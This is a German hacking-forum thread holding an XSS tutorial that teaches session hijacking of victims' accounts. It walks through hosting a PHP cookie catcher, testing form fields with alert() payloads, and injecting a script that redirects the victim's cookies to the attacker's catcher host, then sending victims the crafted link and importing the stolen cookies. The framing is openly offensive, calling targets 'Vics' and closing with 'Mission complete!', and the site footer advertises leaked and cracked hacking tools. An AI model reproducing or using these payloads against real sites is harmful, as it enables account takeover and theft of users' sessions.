Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[TUT] XSS Tutorial by PaulaAbdul

- - - - -

  • Bitte melde dich an um zu Antworten
Eine Antwort in diesem Thema

#1
PaulaAbdul

PaulaAbdul

    Favoured Management

  • Administration
  • Likes
    3741
  • 2157 Beiträge
  • 3745 Bedankt
  • 1337-699
  • verifiziert
  • Android [root]
  • Windows, Linux

*
BELIEBT

XSS Tutorial by PaulaAbdul

Einleitung

In diesem Tutorial zeige ich euch, wie sich durch eine XSS-Lücke die Cookies eines Vics abfangen lassen. Dadurch ist es möglich die Kontrolle über User Accounts zu erhalten.


Was kann man mit Cookies anstellen?

Cookies werden lokal im Browser gespeichert und können somit von uns editiert werden. Durch die Manipulation der Browser Cookies können sogenannte Login-Sessions übernommen werden. Man gibt der vuln Website also vor, bereits eingeloggt zu sein. Das ganze wird auch als Session Hijacking bezeichnet.


Los gehts:

Registriere dich zuerst bei einem Webhoster deiner Wahl (natürlich mit php). Lade anschließend den folgenden Cookie Catcher herunter und uploade ihn mit Hilfe eines FTP Programms beim Webhoster. Anschließend erstellt ihr eine leere Datei cookies.php und setzt für die Datei Schreibrechte (CHMOD 777). Wie das z.B. mit dem FTP Programm Filezilla funktioniert seht ihr hier:
 


Please Login HERE or Register HERE to see this link!



Der Cookie Catcher grabbt die Cookies, IP-Adresse, den Referral Link sowie Uhrzeit & Datum und schreibt sie in die zuvor erstellte Datei cookies.php . Beide Dateien müssen sich im selben Verzeichniss befinden.


Vulnerable Sites finden & testen:

Wir brauchen nun also eine Seite, die verwundbar ist:

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.

 
Wenn Javascript in deinem Browser deaktiviert ist solltest du es an dieser Stelle aktivieren.
Um zu testen, ob eine Seite vuln ist, können wir folgende Codeschnipsel in das zu testende Formularfeld eintippen:
 
"><script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
"><script>alert("XSS")</script>
'><script>alert("XSS")</script>
><script>alert("XSS")</script>
<script>alert("XSS")</script>
Alternativ zu den Anführungszeichen " können auch auch einfache Anführungszeichen (links) verwendet werden: '
Wenn beim Testen nun also eine Popup-Meldung erscheint wie im folgenden Beispiel, ist die Seite vulnerable.




Grabben der Cookies:

Wenn die Seite also vuln ist, versuchen wir nun durch Eingabe des folgenden Codeschnipsels in das Formularfeld die Cookies zu grabben (http:/ /domain.com/catcher.php muss natürlich mit dem Link zum hochgeladenen Script ersetzt werden).
 
<script>document.location="http:/ /domain.com/catcher.php?c="+document.cookie</script>
Um zu sehen ob wir Erfolg hatten können wir nun http:/ /domain.com/cookies.php im Browser aufrufen. Darin sollten sich jetzt die Cookies befinden.


Umsetzung:

Um die Cookies eines Users abzufangen, muss dieser einen Link aufrufen, der den Codeschnipsel bereits beinhaltet. Der Link kann in der Regel einfach nach der Eingabe des Schadcodes in das Formularfeld aus der Adressleiste des Browsers kopiert werden.

Zum Verwalten und editieren der Browser Cookies installierst du dir am besten ein Browser Addon. Für Firefox ist z.B. der

Please Login HERE or Register HERE to see this link!

zu empfehlen. Mit Hilfe des Addons kannst du die erbeuteten Cookies nun hinzufügen.

Ein erneuter Aufruf der vuln Website wird dir nun zeigen, dass du bereits im Account des Victims eingeloggt bist.


> Mission complete!


Dieses Tutorial hat sich nicht von selbst geschrieben. Bei Weitergabe oder Veröffentlichung bitte ich deshalb um einen Verweis zu http://www.toolbase.bz :)
  • Imperial, White-Warti, SeriallKiller und 22 anderen gefällt das

401a3d5869.jpg

 

,,Der blaue Baum" von Prohex (2020)


Thanked by 66 Members:
leantechnician , parisdefr , ZeuS_DSC , izibitzi74 , romiro , CyberFlash , kleinkriminell , marcf2009 , fl4shx , hupfumme , Psykoon303 , L!x , 007 , shok0 , SecurityFlaw , kakao1 , Jozu , JohnR , raakil , kingkev0 , xxxsmackxxx , ZeroFreez , J0cker , ToWFiNiT , Jackson , Coder , Skyler , RudolfAntal , Netwxrk , Flex.Net , mantwohouse , Babo187 , abramas , zepsus , saske46 , H3lium , jacov , HellYeah , Bus1ness Junkie , Albus , nwo , codec4 , smc2014 , Rennsteak , Lykaner112 , 123kimiya123 , Dope , BioLord2013 , tr0p1c , tschilben , Omnipräsent , br0nks , hit , 4cyberbase , Alpha63 , Thesolution247 , jeff , verzweifelt , Iron , Unkiii , BauerIvan , Dagi40 , corkscrew , White-Warti , sub0 , midn84ever

#2
C4shin0ut

C4shin0ut

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    81
  • 48 Beiträge
  • 79 Bedankt
  • Android, Android [root]
  • Windows, Linux

tag das bild ist offline und trotz danke button bleibt mir der inhalt der box verborgen mfg

ansonsten gutes tut danke


----------------------------------------------------------------------------------------------
Das einzige was sicher ist ist der Tod und das ist in jedem Job so
----------------------------------------------------------------------------------------------
Bei Ideen für toolbase tools schreibt mir eine PM! <3
----------------------------------------------------------------------------------------------




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 285 user(s)


    , , _)_, ###, 007, 0x7898f, 123kimiya123, 13fuckthepolice12, 3even, 4cyberbase, 4n0nym0u5, aaerix, abramas, Albus, alfjunior, alnitak, Alpha63, alterego-59, Amigo, Amphe1337, and6578, argentlo, AvdeXg, b0kerst3l, B0ss, B1nary, Babo187, back2hack, BackBurner, Bad Grandpa, bebekid32, berlingo21, BioLord2013, Blackhook, Blackrock, BlackZetsu, Bladeage, blizzard1904, Bojka, bones, bornagain, Bot4ng, Botmopp, br0nks, Bragi, Brokolie, buffer-overflow, bukaterian, Bus1ness Junkie, Butt3rs, C.I.K, c3rberus, C4shin0ut, Caruso, Ch!ller, chimchoca7, Cifer, cls, Cocarando, codec4, Coder, corkscrew, creamfresh, Creo, cruzz, Cube, curlz, CyberFlash, d0p3t, Dagi40, DarkSky, Deny-dz, dervonheute, DingDong, done65, Dope, dorich75, Download305, Doxbindatas, Dr. p0rk, Drizzle, dts1, dun, dynaoh, Eester, Emalik Xantier, EncepT, eskalation, EuropaCash, FalkE, filo, fl4shx, Framerater, Frank White, Franziskaner, FrogPussyGreen, G-Raz0r, gr33d, gutzuu, H3lium, hacked, hackeris, harlek1n, HarryPotter, headshotde, heckerhere, Heinokel0903, hellboybmt, HellYeah, hikhack7, hit, hupfumme, igorborisvas, ikar, Imperial, Interimere, Internets, INTERSPACECOWBOY, Iron, J0cker, jabba, Jackson, JackTheRapper, jacov, jager52, Janjij, Jar3d, jeff, jens3911, jnxz, Jochens, Joey2, JohnR, johny758, Jolt0592, Jozu, Kaase, Kaban, kakao1, Kalasch, KeldorB, killer6508, kingkev0, kiwitone, kleinkriminell, kodachi00564, kollegah25, kollesche, Kutusow, L!x, LearningbyDoing, Letsmakethis, Lilwayne11833, lNobodyl, loginman1, lolorollo, Lucifer8x, Lykaner112, Macy1967, man, marcf2009, matrix567, Maximalx3, maximaxi, me6, Mehedix, mesagio, Methyl, mewue, midn84ever, milton3453, mindblow, Mofug, mogel, montana54, most_uniQue, Mr_NiceGuy, MrTube, ms8634, MulderFX, mxtrn, N0Name, N4dja, n4pst3r, nEOx04, nibble nibble, nischke, notinsane, nwo, omnicrunch, Omnipräsent, On3byT, oreagel, Osed28, PadX18, PaulaAbdul, paulaner, PenguinCyborg, Pentoman, peppi200, peppi2000, peterhanswurst3456, Prof, ProHex, psy86, Psykoon303, python_snippet, raakil, rastalani, RazoR', Red242Skull, ref0rm, Rennsteak, Rogerlopensio, romiro, rookyy66, Rothschild, rsneumann, RudolfAntal, S1lent, S4lent, samuraisxmali, saske46, Sayco, saynthng, schildkrieg4, SecurityFlaw, SeriallKiller, Sharky, Shego, shok0, Silent0wn3r, Skyler, sm1lie, smc2014, Smokyjoe, sngglr, spawn1911, st0rm, Stech3r, stoneserv, sub0, Sultan361, synnergy, T00LStar, t33t86, Tabasco, Take1T, thaJack, the.3nd, Thesolution247, tinarchin, ToWFiNiT, tr0p1c, Traxx, Tron, tschilben, tybor, UDXR, Unkiii, User8329, ValleX, venom, verzweifelt, Veyron, w0tan, weißnicht, White-Warti, whois, x1z0ng, Xantar, Xenio, Xenos88, xlF1N4L, xMarvvx, xVirtu, xxxsmackxxx, XYtarget, yellow.leaves, youngh4cker, zepsus, Zero-X, Zerobyte, ZeroFreez, Zorrez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.